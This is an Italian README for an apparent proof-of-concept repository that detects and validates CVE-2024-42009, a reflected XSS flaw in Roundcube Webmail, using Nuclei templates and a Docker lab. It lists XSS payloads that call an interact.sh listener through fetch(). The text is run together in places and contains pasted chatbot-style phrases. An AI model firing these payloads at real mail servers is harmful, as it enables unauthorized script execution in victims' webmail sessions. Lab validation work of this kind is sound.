
Questo repository contiene un template Nuclei e risorse di supporto per dimostrare e validare in sicurezza CVE-2024-42009, una vulnerabilità critica di XSS riflesso in Roundcube Webmail. Il difetto risiede nella funzione message_body() in show.php, dove le modifiche post-sanificazione portano a desanificazione e rendering non sicuro di contenuti email HTML appositamente creati.
⚠️ Questo PoC è destinato esclusivamente a scopi educativi e test autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione di test.
message_body() in show.phpQuesto repository utilizza il rilevamento Out-of-Band (OOB) tramite Interactsh per confermare l'esecuzione di JavaScript in un laboratorio controllato.
<body> contenente onanimationstart e un beacon verso InteractshUtilizza il file Docker Compose fornito per avviare un'istanza locale di Roundcube con MailHog (sink SMTP) e MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ Non utilizzare il tuo account Google.
CVE-2024-42009-OOB.yaml – Template Nuclei con rilevamento Interactsh e Out-of-Band (OOB)CVE-2024-42009.yaml – Template Nuclei senza Interactsh e OOBdocker-compose.yml – Configurazione dell'ambiente di laboratorio per Roundcube WebmailImages/ – Screenshot che mostrano gli hit HTTP/DNS da InteractshQuesto video illustra l'intera catena di exploit:
Per includere responsabilmente questi payload XSS nel tuo README, dovrai inserirli in una sezione chiaramente etichettata per scopi educativi o di test. Ecco una struttura suggerita:
⚠️ Disclaimer: Questi payload sono destinati esclusivamente a uso educativo e test di sicurezza autorizzati. Non distribuirli su sistemi senza autorizzazione esplicita.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit con il tuo endpoint listener.Aggiorna Roundcube a:
Perfetto — ecco una sezione Riferimenti pulita e professionale che puoi includere nel tuo README o nell'invio via email per CVE-2024-42009. Cita tutte le fonti che hai elencato, formattate per chiarezza e credibilità: